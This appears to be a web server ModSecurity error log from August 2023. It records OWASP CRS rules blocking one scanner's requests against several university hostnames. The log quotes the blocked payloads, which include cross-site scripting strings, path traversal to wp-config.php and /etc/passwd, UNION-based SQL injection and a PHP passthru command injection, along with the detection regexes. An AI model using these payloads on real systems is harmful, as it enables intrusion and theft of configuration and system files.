[Tue Aug 29 11:47:27.420892 2023] [:error] [pid 2163] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:ff. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:ff: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/wp-content/plugins/knews/wysiwyg/fontpicker/"] [unique_id "ZO14X8Co-f0AAAhzvsMAAAAx"]
[Tue Aug 29 11:47:27.447635 2023] [:error] [pid 2158] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:ff. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:ff: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/wp-content/plugins/knews/wysiwyg/fontpicker/"] [unique_id "ZO14X8Co-f0AAAhui9QAAAAr"]
[Tue Aug 29 11:47:28.393409 2023] [:error] [pid 2252] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:keymap. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: );>// found within ARGS:keymap: <svg/onload=confirm(document.domain);>//a"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/content/crx/de/setPreferences.jsp;\\n.html"] [unique_id "ZO14YMCo-f0AAAjM7E0AAAAT"]
[Tue Aug 29 11:47:28.470339 2023] [:error] [pid 2268] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:ff. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:ff: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/wp-content/plugins/knews/wysiwyg/fontpicker/"] [unique_id "ZO14YMCo-f0AAAjcHZkAAAAY"]
[Tue Aug 29 11:47:31.443076 2023] [:error] [pid 2149] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:wp_abspath. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:wp_abspath: ../../../wp-config.php\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/wp-content/plugins/brandfolder/callback.php"] [unique_id "ZO14Y8Co-f0AAAhl0JkAAAAi"]
[Tue Aug 29 11:47:31.451968 2023] [:error] [pid 2283] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:wp_abspath. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:wp_abspath: ../../../wp-config.php\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/wp-content/plugins/brandfolder/callback.php"] [unique_id "ZO14Y8Co-f0AAAjrbIsAAAAP"]
[Tue Aug 29 11:47:31.452550 2023] [:error] [pid 2230] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:wp_abspath. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:wp_abspath: ../../../wp-config.php\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/wp-content/plugins/brandfolder/callback.php"] [unique_id "ZO14Y8Co-f0AAAi2yIcAAAAN"]
[Tue Aug 29 11:47:31.474937 2023] [:error] [pid 2266] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:wp_abspath. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:wp_abspath: ../../../wp-config.php\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/wp-content/plugins/brandfolder/callback.php"] [unique_id "ZO14Y8Co-f0AAAjav2YAAAAV"]
[Tue Aug 29 11:47:31.485007 2023] [:error] [pid 2252] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:wp_abspath. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:wp_abspath: ../../../wp-config.php\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wp-content/plugins/brandfolder/callback.php"] [unique_id "ZO14Y8Co-f0AAAjM7FAAAAAT"]
[Tue Aug 29 11:47:32.615295 2023] [:error] [pid 2285] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:wp_abspath. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:wp_abspath: ../../../wp-config.php\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/wp-content/plugins/brandfolder/callback.php"] [unique_id "ZO14ZMCo-f0AAAjtc2cAAAAX"]
[Tue Aug 29 11:47:32.835561 2023] [:error] [pid 2149] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:FILECAMERA. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:FILECAMERA: ../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/cgi-bin/wapopen"] [unique_id "ZO14ZMCo-f0AAAhl0J8AAAAi"]
[Tue Aug 29 11:47:32.856740 2023] [:error] [pid 2149] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:FILECAMERA. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:FILECAMERA: ../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/cgi-bin/wapopen"] [unique_id "ZO14ZMCo-f0AAAhl0KAAAAAi"]
[Tue Aug 29 11:47:32.875835 2023] [:error] [pid 2262] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:FILECAMERA. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:FILECAMERA: ../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/cgi-bin/wapopen"] [unique_id "ZO14ZMCo-f0AAAjW9D4AAAAA"]
[Tue Aug 29 11:47:32.914719 2023] [:error] [pid 2149] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:FILECAMERA. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:FILECAMERA: ../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/cgi-bin/wapopen"] [unique_id "ZO14ZMCo-f0AAAhl0KMAAAAi"]
[Tue Aug 29 11:47:32.916104 2023] [:error] [pid 2262] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:FILECAMERA. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:FILECAMERA: ../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/cgi-bin/wapopen"] [unique_id "ZO14ZMCo-f0AAAjW9EAAAAAA"]
[Tue Aug 29 11:47:33.409406 2023] [:error] [pid 2262] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:FILECAMERA. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:FILECAMERA: ../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/cgi-bin/wapopen"] [unique_id "ZO14ZcCo-f0AAAjW9EUAAAAA"]
[Tue Aug 29 11:47:34.529237 2023] [:error] [pid 2267] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../../../../ found within ARGS:id: 1/../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/fetchBody"] [unique_id "ZO14ZsCo-f0AAAjbw0kAAAAW"]
[Tue Aug 29 11:47:34.542119 2023] [:error] [pid 2262] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../../../../ found within ARGS:id: 1/../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/fetchBody"] [unique_id "ZO14ZsCo-f0AAAjW9EwAAAAA"]
[Tue Aug 29 11:47:34.548670 2023] [:error] [pid 2267] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../../../../ found within ARGS:id: 1/../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/fetchBody"] [unique_id "ZO14ZsCo-f0AAAjbw0oAAAAW"]
[Tue Aug 29 11:47:34.603620 2023] [:error] [pid 2262] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../../../../ found within ARGS:id: 1/../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/fetchBody"] [unique_id "ZO14ZsCo-f0AAAjW9E8AAAAA"]
[Tue Aug 29 11:47:34.653556 2023] [:error] [pid 2242] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../../../../ found within ARGS:id: 1/../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/fetchBody"] [unique_id "ZO14ZsCo-f0AAAjCbIIAAAAB"]
[Tue Aug 29 11:47:35.563153 2023] [:error] [pid 2266] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../../../../ found within ARGS:id: 1/../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/fetchBody"] [unique_id "ZO14Z8Co-f0AAAjav3cAAAAV"]
[Tue Aug 29 11:47:36.988500 2023] [:error] [pid 2242] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: } found within ARGS:username: {{username}}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "journal.unla.ac.id"] [uri "/admin/ajax.php"] [unique_id "ZO14aMCo-f0AAAjCbJ0AAAAB"]
[Tue Aug 29 11:47:37.368683 2023] [:error] [pid 2252] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: } found within ARGS:username: {{username}}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "pusatbahasa.unla.ac.id"] [uri "/admin/ajax.php"] [unique_id "ZO14acCo-f0AAAjM7FMAAAAT"]
[Tue Aug 29 11:47:37.417279 2023] [:error] [pid 2267] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:car_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: --  found within ARGS:car_id: -1 union select 1,md5(999999999),3,4,5,6,7,8,9,10-- "] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/booking.php"] [unique_id "ZO14acCo-f0AAAjbw1YAAAAW"]
[Tue Aug 29 11:47:37.459009 2023] [:error] [pid 2267] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:car_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: --  found within ARGS:car_id: -1 union select 1,md5(999999999),3,4,5,6,7,8,9,10-- "] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/booking.php"] [unique_id "ZO14acCo-f0AAAjbw1gAAAAW"]
[Tue Aug 29 11:47:37.466578 2023] [:error] [pid 2242] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:car_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: --  found within ARGS:car_id: -1 union select 1,md5(999999999),3,4,5,6,7,8,9,10-- "] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/booking.php"] [unique_id "ZO14acCo-f0AAAjCbKMAAAAB"]
[Tue Aug 29 11:47:37.498454 2023] [:error] [pid 2267] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:car_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: --  found within ARGS:car_id: -1 union select 1,md5(999999999),3,4,5,6,7,8,9,10-- "] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/booking.php"] [unique_id "ZO14acCo-f0AAAjbw1oAAAAW"]
[Tue Aug 29 11:47:38.417498 2023] [:error] [pid 2251] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:car_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: --  found within ARGS:car_id: -1 union select 1,md5(999999999),3,4,5,6,7,8,9,10-- "] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/booking.php"] [unique_id "ZO14asCo-f0AAAjL8VMAAAAR"]
[Tue Aug 29 11:47:39.357585 2023] [:error] [pid 2265] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:car_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: --  found within ARGS:car_id: -1 union select 1,md5(999999999),3,4,5,6,7,8,9,10-- "] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/booking.php"] [unique_id "ZO14a8Co-f0AAAjZRbsAAAAS"]
[Tue Aug 29 11:47:39.396760 2023] [:error] [pid 2230] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:DB_DATABASE. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ');/* found within ARGS:DB_DATABASE: ');passthru('cat /etc/passwd');/*"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/install/install.php"] [unique_id "ZO14a8Co-f0AAAi2yJYAAAAN"]
[Tue Aug 29 11:47:39.409843 2023] [:error] [pid 2265] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:DB_DATABASE. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ');/* found within ARGS:DB_DATABASE: ');passthru('cat /etc/passwd');/*"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/install/install.php"] [unique_id "ZO14a8Co-f0AAAjZRbwAAAAS"]
[Tue Aug 29 11:47:39.426282 2023] [:error] [pid 2242] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:DB_DATABASE. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ');/* found within ARGS:DB_DATABASE: ');passthru('cat /etc/passwd');/*"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/install/install.php"] [unique_id "ZO14a8Co-f0AAAjCbKoAAAAB"]
[Tue Aug 29 11:47:39.428535 2023] [:error] [pid 2317] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:DB_DATABASE. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ');/* found within ARGS:DB_DATABASE: ');passthru('cat /etc/passwd');/*"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/install/install.php"] [unique_id "ZO14a8Co-f0AAAkNPmIAAAAI"]
[Tue Aug 29 11:47:39.435894 2023] [:error] [pid 2230] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:DB_DATABASE. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ');/* found within ARGS:DB_DATABASE: ');passthru('cat /etc/passwd');/*"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/install/install.php"] [unique_id "ZO14a8Co-f0AAAi2yJcAAAAN"]
